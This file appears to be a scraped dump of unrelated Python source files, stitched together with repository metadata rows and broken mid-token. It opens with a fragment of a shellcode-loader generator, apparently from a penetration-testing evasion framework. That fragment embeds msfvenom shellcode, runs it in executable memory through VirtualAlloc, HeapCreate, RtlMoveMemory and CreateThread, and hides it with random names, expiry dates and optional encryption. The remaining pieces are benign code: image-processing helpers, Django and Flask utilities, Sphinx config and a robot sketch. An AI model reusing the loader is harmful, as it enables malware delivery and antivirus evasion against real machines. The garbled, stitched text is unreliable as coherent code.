PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["INJECT_METHOD"][0].lower() == "heap":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
HeapVar = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
Payl |
fabianvaccaro/pygums | pythonLibs/mahotas-1.1.0/mahotas/internal.py | Python | gpl-2.0 | 5,299 | 0.003963 | # Copyright (C) 2011-2012, Luis Pedro Coelho <luis@luispedro.org>
# vim: set ts=4 sts=4 sw=4 expandtab smartindent:
#
# License: MIT (see COPYING file)
import numpy as np
def _get_output(array, out, fname, dtype=None, output=None):
'''
output = _get_output(array, out, fname, dtype=None, output=None)
Implements the mahotas output convention:
(1) if `out` is None, return np.empty(array.shape, array.dtype)
(2) else verify that output is of right size, shape, and contiguous
Parameters
----------
array : ndarray
out : ndarray or None
fname : str
Function name. Used in error messages
Returns
-------
output : ndarray
'''
detail = '.\nWhen an output argument is used, the checking is very strict as this is a performance feature.'
if dtype is None:
dtype = array.dtype
if output is not None:
import warnings
warnings.warn('Using deprecated `output` argument in function `%s`. Please use `out` in the future. It has exactly the same meaning and it matches what numpy uses.' % fname, DeprecationWarning)
if out is not None:
warnings.warn('Using both `out` and `output` in function `%s`.\nMahotas is going to ignore the `output` argument and use the `out` version exclusively.' % fname)
else:
out = output
if out is None:
return np.empty(array.shape, dtype)
if out.dtype != dtype:
raise ValueError(
'mahotas.%s: `out` has wrong type (out.dtype is %s; expected %s)%s' %
(fname, out.dtype, dtype, detail))
if out.shape != array.shape:
raise ValueError('mahotas.%s: `out` has wrong shape (got %s, while expecting %s)%s' % (fname, out.shape, array.shape, detail))
if not out.flags.contiguous:
raise ValueError('mahotas.%s: `out` is not c-array%s' % (fname,detail))
return out
def _get_axis(array, axis, fname):
'''
axis = _get_axis(array, axis, fname)
Checks that ``axis`` is a valid axis of ``array`` and normalises it.
Parameters
----------
array : ndarray
axis : int
fname : str
Function name. Used in error messages
Returns
-------
axis : int
The positive index of the axis to use
'''
if axis < 0:
axis += len(array.shape)
if not (0 <= axis < len(array.shape)):
raise ValueError('mahotas.%s: `axis` is out of bounds (maximum was %s, got %s)' % (fname, array.ndim, axis))
return axis
def _normalize_sequence(array, value, fname):
'''
values = _normalize_sequence(array, value, fname)
If `value` is a sequence, checks that it has an element for each dimension
of `array`. Otherwise, returns a sequence that repeats `value` once for
each dimension of array.
Parameters
----------
array : ndarray
value : sequence or scalar
fname : str
Function name. Used in error messages
Returns
-------
values : sequence
'''
try:
value = list(value)
except TypeError:
return [value for s in array.shape]
if len(value) != array.ndim:
raise ValueError('mahotas.%s: argument is sequence, but has wrong size (%s for an array of %s dimensions)' % (fname, len(value), array.ndim))
return value
def _verify_is_floatingpoint_type(A, function_name):
'''
_verify_is_integer_type(array, "function")
Checks that ``A`` is a floating-point array. If it is not, it raises
``TypeError``.
Parameters
----------
A : ndarray
function_name : str
Used for error messages
'''
if not np.issubdtype(A.dtype, np.float):
raise TypeError('mahotas.%s: This function only accepts floating-point types (passed array of type %s)' % (function_name, A.dtype))
def _verify_is_integer_type(A, function_name):
'''
_verify_is_integer_type(array, "function")
Checks that ``A`` is an integer array. If it is not, it raises
``TypeError``.
Parameters
----------
A : ndarray
function_name : str
Used for error messages
'''
int_types=[
np.bool,
np.uint8,
np.int8,
np.uint16,
np.int16,
np.uint32,
np.int32,
np.int64,
np.uint64,
| ]
if A.dtype not in int_typ | es:
raise TypeError('mahotas.%s: This function only accepts integer types (passed array of type %s)' % (function_name, A.dtype))
def _make_binary(array):
'''
bin = _make_binary(array)
Returns (possibly a copy) of array as a boolean array
'''
array = np.asanyarray(array)
if array.dtype != bool:
return (array != 0)
return array
def _as_floating_point_array(array):
'''
array = _as_floating_point_array(array)
Returns (possibly a copy) of array as a floating-point array
'''
array = np.asanyarray(array)
if not np.issubdtype(array.dtype, np.float_):
return array.astype(np.double)
return array
def _check_3(arr, funcname):
if arr.ndim != 3 or arr.shape[2] != 3:
raise ValueError('mahotas.%s: this function expects an array of shape (h, w, 3), received an array of shape %s.' % (funcname, arr.shape))
|
abhi-bit/memcache-queue | benchmark.py | Python | mit | 1,075 | 0.008372 | from memqueue import MemQueue
import sys, time
import memcache
from optparse import OptionParser
client = ['127.0.0.1:11211']
queue = M | emQueue('benchmark', memcache.Client(client))
start = time.time()
if __name__ == '__main__':
parser = OptionParser(usage="usage: %prog [options] filename",
version="%prog 0.1")
parser.add_option("-a", "--add", dest="add", | default='notAdd', help="add keys to queue")
parser.add_option("-r", "--read", dest="read", default='notRead', help="read from queue")
parser.add_option("-c", "--count", dest="count", default='1000', type='int', help="no. of keys to read/add")
(options, args) = parser.parse_args()
add = options.add
read = options.read
count = options.count
if add != 'notAdd':
for index in xrange(count):
queue.add('data %s' % index)
print ('Added %d keys' % count)
if read != 'notRead':
for index in xrange(count):
queue.get()
print ('Read %s keys' % count)
print ('Time elapsed: %s seconds' % (time.time() - start))
|
socialdevices/manager | profiler/management/commands/plotprofilingstats.py | Python | bsd-3-clause | 1,441 | 0.004858 | from django.core.management.base import NoArgsCommand, CommandError
from profiler.db import ProfilerDatabase
from profiler.plotter import StatsPlotter
import time
class Command(NoArgsCommand):
help = 'Creates graphs based on profiling statistics.'
can_import_settings = True
def handle_noargs(self, **options):
db = ProfilerDatabase()
profiler_group_runs = db.get_profiler_group_runs()
prompt_str = 'Which profiler run do you want to plot?\n'
for index, profiler_group__run in enumerate(profiler_group_runs):
prompt_str += '(%i) %s - (started: %s)\n' % (index, profiler_group__run['name'], profiler_group__run['started'])
prompt_str += '\nType your choice: '
profiler_group_run_index = int(raw_input(prompt_str))
profi | ler_group_run = profiler_group_runs[profiler_group_run_index]
try:
| start_time = time.time()
dir_name = '%s_%s' % (profiler_group_run['name'], profiler_group_run['started'])
plotter = StatsPlotter()
plotter.plot(profiler_group_run['id'], dir_name)
except KeyboardInterrupt:
plotter.stop()
self.stdout.write('\nPlotting stopped.\n')
except Exception, e:
raise CommandError(e)
else:
elapsed = time.time() - start_time
self.stdout.write('Plotting finished in %i seconds\n' % elapsed) |
egabancho/invenio-communities | docs/conf.py | Python | gpl-2.0 | 10,685 | 0.005335 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015 CERN.
#
# Invenio is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
from __future__ import print_function
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
sys.path.insert(0, os.path.abspath('_ext'))
import ultramock
ultramock.activate()
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Invenio Communities'
copyright = u'2015, CERN'
author = u'CERN'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# Get the version string. Cannot be done with import!
g = {}
with open(os.path.join('..', 'invenio_communities', 'version.py'), 'rt') as fp:
exec(fp.read(), g)
version = g['__version__']
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are | ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ---------------------------- | ------------------
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
# only set the theme when we are not on RTD
if not on_rtd:
try:
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
except ImportError:
print("`sphinx_rtd_theme` not found, pip install it", file=sys.stderr)
html_theme = 'alabaster'
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'invenio-communities_namedoc' |
ProgDan/maratona | Maratona_Python/OBI2013/tomadas.py | Python | gpl-3.0 | 140 | 0.014286 | #!/ | usr/bin/python
#coding: utf-8
T1, T2, T3, T4 = map(int,input().split())
s = int(T1) + int(T2) + int(T3) + int(T4) - 3
print(s)
exit(0 | )
|
open-ods/open-ods | openods/request_utils.py | Python | gpl-3.0 | 1,400 | 0.004286 | import uuid
from flask import g
# Utility method to get source_ip from a request - first checks headers for forwarded IP, then uses remote_addr if not
def get_source_ip(my_request):
try:
# First check for an X-Forwarded-For header provided by a proxy / router e.g. on Heroku
source_ip = my_request.headers['X-F | orwarded-For']
except KeyError:
try:
# First check for an X-Forwarded-For header provided by a proxy / router e.g. on Heroku
source_ip = my_request.head | ers['X-Client-IP']
except KeyError:
# If that header is not present, attempt to get the Source IP address from the request itself
source_ip = my_request.remote_addr
g.source_ip = source_ip
return source_ip
# Utility method to get the request_id from the X-Request-Id header, and if not present generate one
def get_request_id(my_request):
try:
request_id = my_request.headers['X-Request-Id']
except KeyError:
request_id = str(uuid.uuid4())
g.request_id = request_id
return request_id
# Utility method which takes a dict of request parameters and writes them out as pipe delimeted kv pairs
def dict_to_piped_kv_pairs(dict_for_conversion):
output_string = ""
for key, value in sorted(dict_for_conversion.items()):
output_string += "{0}={1}|".format(key, value)
return output_string
|
m-garanin/conference | urls.py | Python | bsd-3-clause | 526 | 0.007605 | from django.conf.urls.defaults import patterns, include, url
from django.conf import settings
from django.contrib import admin
admin.autodiscover()
urlpatterns = patte | rns('',
url(r'^admin/', include(admin.site.urls)),
(r'^site_media/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings.STATIC_ROOT}),
(r'^storage/(?P<path>.*)$', 'django.views.static.serve', {'document_root': settings. | MEDIA_ROOT}),
url(r'', include('mbco.conference.app.urls')),
url(r'^', include('cms.urls')),
)
|
acourt/doortracker | doorreport/doorlogger/models.py | Python | gpl-3.0 | 531 | 0.035782 | from django.db import models
from datetime import datetime
class Door(models.Model):
door_name = models.CharField(max_length=144)
door_type = models.CharField(max_length=35)
def __str__(self):
return self.door_name
class Event(models.Model | ):
door = models.ForeignKey(Door, on_delete=models.CASCADE)
event_type = models.CharField(max_length=20)
open_level = models.IntegerField(default=0)
ti | me_stamp = models.DateTimeField('time stamp')
def __str__(self):
return ("%s: %d" % (self.event_type, self.open_level)) |
KrzysiekJ/django-getpaid | getpaid/utils.py | Python | mit | 1,875 | 0.002133 | from django.conf import settings
import sys
def import_name(name):
components = name.split('.')
if len(components) == 1:
# direct module, import the module directly
mod = __import__(name, globals(), locals(), [name])
else:
# the module is within another, so we
# need to import it from there
parent_path = components[0:-1]
module_name = components[-1]
parent_mod = __import__(
'.'.join(parent_path), globals(), locals(), [module_name])
mod = getattr(parent_mod, components[-1])
return mod
def import_backend_modules(submodule=None):
backends = getattr(settings, 'GETPAID_BACKENDS', [])
modules = {}
for backend_name in backends:
fqmn = backend_name
if submodule:
fqmn = | '%s.%s' % (fqmn, submodule)
__import__(fqmn)
module = sys.modules[fqmn]
modules[backend_name] = module
return modules
def get_backend_choices(currency=None):
"""
Get active backends modules. Backend list can be filtered by supporting given currency.
"""
choices = []
backends_names = | getattr(settings, 'GETPAID_BACKENDS', [])
for backend_name in backends_names:
backend = import_name(backend_name)
if currency:
if currency in backend.PaymentProcessor.BACKEND_ACCEPTED_CURRENCY:
choices.append((backend_name, backend.PaymentProcessor.BACKEND_NAME, ))
else:
choices.append((backend_name, backend.PaymentProcessor.BACKEND_NAME, ))
return choices
def get_backend_settings(backend):
"""
Returns backend settings. If it does not exist it fails back to empty dict().
"""
backends_settings = getattr(settings, 'GETPAID_BACKENDS_SETTINGS', {})
try:
return backends_settings[backend]
except KeyError:
return {}
|
pravinas/et-maslab-2016 | sandbox/test_hugs.py | Python | mit | 2,236 | 0.00805 | from tamproxy import SyncedSketch, Timer
from tamproxy.devices import Motor, Encoder
# Cycles a motor back and forth between -255 and 255 PWM every ~5 seconds
HUGS_MOTOR_CONTROLLER_DIRECTION = 8
HUGS_MOTOR_CONTROLLER_PWM = 9
HUGS_MOTOR_ENCODER_YELLOW = 31
HUGS_MOT | OR_ENCODER_WHITE = 32
# The limit point at which the motor is considered stalled.
INTAKE_ENCODER_LIMIT = 150
# The speed of the intake motors.
INTAKE_POWER = 120
class HugTest(SyncedSketch):
def setup(self):
# Motor object representing the intake mechanism motors.
self.intakeMotor = Motor(self.tamp, HU | GS_MOTOR_CONTROLLER_DIRECTION, HUGS_MOTOR_CONTROLLER_PWM)
# Encoder object for the intake motor.
self.intakeEncoder = Encoder(self.tamp, HUGS_MOTOR_ENCODER_YELLOW, HUGS_MOTOR_ENCODER_WHITE)
# Timer object to moderate checking for intake errors.
self.intakeTimer = Timer()
# Are the intake motors going forward? True if so, False if reversing.
self.intakeDirection = False
# Start the intake motor.
self.intakeMotor.write(self.intakeDirection, INTAKE_POWER)
def loop(self):
self.checkForIntakeErrors()
def checkForIntakeErrors(self, checkTime = 1000, reverseTime = 3000):
if self.intakeDirection: # We are moving forward.
if self.intakeTimer.millis() > checkTime:
self.intakeTimer.reset()
if self.intakeEncoder.val < INTAKE_ENCODER_LIMIT: # if we're stalled
self.intakeDirection = True
self.intakeMotor.write(self.intakeDirection, INTAKE_POWER)
else: # if we're not stalled
self.intakeEncoder.write(0)
else: # We are reversing the motors.
if self.intakeTimer.millis() > reverseTime:
self.intakeTimer.reset()
self.intakeDirection = False
self.intakeMotor.write(self.intakeDirection, INTAKE_POWER)
self.intakeEncoder.write(0)
self.intakeMotor.write(self.intakeDirection, INTAKE_POWER)
if __name__ == "__main__":
sketch = HugTest(1, -0.00001, 100)
sketch.run() |
georgeyk/quickstartup | quickstartup/website/urls.py | Python | mit | 158 | 0.006329 | # coding: utf-8
from django.conf.urls import p | atterns, url
urlpatterns = patterns('',
| url(r"^$", "quickstartup.website.views.index", name="index"),
)
|
skagedal/fido | experiments/test.py | Python | gpl-2.0 | 3,542 | 0.008752 | from __future__ import print_function
import sqlite3
import time
from datetime import datetime
def adapt_datetime(ts):
return int(time.mktime(ts.timetuple()))
sqlite3.register_adapter(datetime, adapt_datetime)
def pp(cursor, data=None, rowlens=0):
d = | cursor.description
if not d:
return "#### NO RESULTS ###"
names = []
lengths = []
rules = []
if not data:
data = cursor.fetchall()
for dd in d: # iterate over description
l = dd[1]
if not l:
l = 12 # or default arg ...
l = max(l, | len(dd[0])) # handle long names
names.append(dd[0])
lengths.append(l)
for col in range(len(lengths)):
if rowlens:
rls = [len(str(row[col])) for row in data if row[col]]
lengths[col] = max([lengths[col]]+rls)
rules.append("-"*lengths[col])
format = " ".join(["%%-%ss" % l for l in lengths])
result = [format % tuple(names)]
result.append(format % tuple(rules))
for row in data:
result.append(format % row)
return "\n".join(result)
def create_tables(c):
c.execute('''
CREATE TABLE items (
item_title TEXT,
item_content TEXT,
item_posted INTEGER,
item_updated INTEGER,
item_is_read INTEGER DEFAULT 0,
item_mute INTEGER,
feed_id INTEGER NOT NULL
)
''')
c.execute('''
CREATE TABLE feeds (
feed_id INTEGER PRIMARY KEY,
feed_title TEXT,
feed_metadata TEXT,
feed_priority INTEGER DEFAULT 0,
feed_mute INTEGER
)
''')
STEVES_FOOD = 1
FRIEND_TOM = 2
WORK_STUFF = 3
TIME_WASTE = 4
def create_feeds(c):
c.executemany('''INSERT INTO feeds (feed_title, feed_id, feed_priority) VALUES (?, ?, ?)''',
[("Steve's Food", STEVES_FOOD, 0),
('Friend Tom', FRIEND_TOM, 2),
('Work Stuff', WORK_STUFF, 1),
('Time Waste', TIME_WASTE, 0)])
def create_items(c):
c.executemany('''
INSERT INTO items (
item_title,
feed_id,
item_is_read,
item_updated
) VALUES (?, ?, ?, ?)''',
[('Sandwich!', STEVES_FOOD, False, datetime(2012, 11, 01)),
('Work more!', WORK_STUFF, False, datetime(2011, 01, 05)),
('Work less!', WORK_STUFF, False, datetime(2010, 01, 05)),
('Tom says Hi!', FRIEND_TOM, False, datetime(2009, 01, 01)),
('Old sandwich', STEVES_FOOD, True, datetime(2008, 01, 01))
])
def test():
conn = sqlite3.connect(':memory:')
c = conn.cursor()
create_tables(c)
create_feeds(c)
create_items(c)
# c.execute('SELECT * FROM feeds')
# print ()
# print (pp (c))
# c.execute('SELECT * FROM items')
# print ()
# print (pp (c))
c.execute("""
SELECT item_title, feed_title, feed_priority, item_updated FROM items, feeds USING (feed_id)
WHERE item_is_read = 0
ORDER BY feed_priority DESC, item_updated
""")
print ()
print (pp (c))
print ()
return conn
test()
|
kscharding/integral-solutions-smxq | codereview/models.py | Python | apache-2.0 | 28,836 | 0.01082 | # Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""App Engine data model (schema) definition for Rietveld."""
import logging
import md5
import os
import re
import time
from google.appengine.api import memcache
from google.appengine.api import urlfetch
from google.appengine.api import users
from google.appengine.ext import db
from django.conf import settings
from codereview import patching
from codereview import utils
from codereview.exceptions import FetchError
CONTEXT_CHOICES = (3, 10, 25, 50, 75, 100)
### GQL query cache ###
_query_cache = {}
def gql(cls, clause, *args, **kwds):
"""Return a query object, from the cache if possible.
Args:
cls: a db.Model subclass.
clause: a query clause, e.g. 'WHERE draft = TRUE'.
*args, **kwds: positional and keyword arguments to be bound to the query.
Returns:
A db.GqlQuery instance corresponding to the query with *args and
**kwds bound to the query.
"""
query_string = 'SELECT * FROM %s %s' % (cls.kind(), clause)
query = _query_cache.get(query_string)
if query is None:
_query_cache[query_string] = query = db.GqlQuery(query_string)
query.bind(*args, **kwds)
return query
### Issues, PatchSets, Patches, Contents, Comments, Messages ###
class Issue(db.Model):
"""The major top-level entity.
It has one or more PatchSets as its descendants.
"""
subject = db.StringProperty(required=True)
description = db.TextProperty()
#: in Subversion - repository path (URL) for files in patch set
base = db.StringProperty()
#: if True then base files for patches were uploaded with upload.py
#: (if False - then Rietveld attempts to download them from server)
local_base = db.BooleanProperty(default=False)
repo_guid = db.StringProperty()
owner = db.UserProperty(auto_current_user_add=True, required=True)
created = db.DateTimeProperty(auto_now_add=True)
modified = db.DateTimeProperty(auto_now=True)
reviewers = db | .ListProperty(db.Email)
cc = db.ListProperty(db.Email)
closed = db.BooleanProperty(default=False)
private = db.BooleanProperty(default=False)
n_comme | nts = db.IntegerProperty()
_is_starred = None
@property
def is_starred(self):
"""Whether the current user has this issue starred."""
if self._is_starred is not None:
return self._is_starred
account = Account.current_user_account
self._is_starred = account is not None and self.key().id() in account.stars
return self._is_starred
def user_can_edit(self, user):
"""Return true if the given user has permission to edit this issue."""
return user and (user == self.owner or self.is_collaborator(user)
or users.is_current_user_admin())
@property
def edit_allowed(self):
"""Whether the current user can edit this issue."""
account = Account.current_user_account
if account is None:
return False
return self.user_can_edit(account.user)
def update_comment_count(self, n):
"""Increment the n_comments property by n.
If n_comments in None, compute the count through a query. (This
is a transitional strategy while the database contains Issues
created using a previous version of the schema.)
"""
if self.n_comments is None:
self.n_comments = self._get_num_comments()
self.n_comments += n
@property
def num_comments(self):
"""The number of non-draft comments for this issue.
This is almost an alias for self.n_comments, except that if
n_comments is None, it is computed through a query, and stored,
using n_comments as a cache.
"""
if self.n_comments is None:
self.n_comments = self._get_num_comments()
return self.n_comments
def _get_num_comments(self):
"""Helper to compute the number of comments through a query."""
return gql(Comment,
'WHERE ANCESTOR IS :1 AND draft = FALSE',
self).count()
_num_drafts = None
@property
def num_drafts(self):
"""The number of draft comments on this issue for the current user.
The value is expensive to compute, so it is cached.
"""
if self._num_drafts is None:
account = Account.current_user_account
if account is None:
self._num_drafts = 0
else:
query = gql(Comment,
'WHERE ANCESTOR IS :1 AND author = :2 AND draft = TRUE',
self, account.user)
self._num_drafts = query.count()
return self._num_drafts
@staticmethod
def _collaborator_emails_from_description(description):
"""Parses a description, returning collaborator email addresses.
Broken out for unit testing.
"""
collaborators = []
for line in description.splitlines():
m = re.match(
r'\s*COLLABORATOR\s*='
r'\s*([a-zA-Z0-9._]+@[a-zA-Z0-9_]+\.[a-zA-Z0-9._]+)\s*',
line)
if m:
collaborators.append(m.group(1))
return collaborators
def collaborator_emails(self):
"""Returns a possibly empty list of emails specified in
COLLABORATOR= lines.
Note that one COLLABORATOR= lines is required per address.
"""
if not self.description:
return []
return Issue._collaborator_emails_from_description(self.description)
def is_collaborator(self, user):
"""Returns true if the given user is a collaborator on this issue.
This is determined by checking if the user's email is listed as a
collaborator email.
"""
if not user:
return False
return user.email() in self.collaborator_emails()
class PatchSet(db.Model):
"""A set of patchset uploaded together.
This is a descendant of an Issue and has Patches as descendants.
"""
issue = db.ReferenceProperty(Issue) # == parent
message = db.StringProperty()
data = db.BlobProperty()
url = db.LinkProperty()
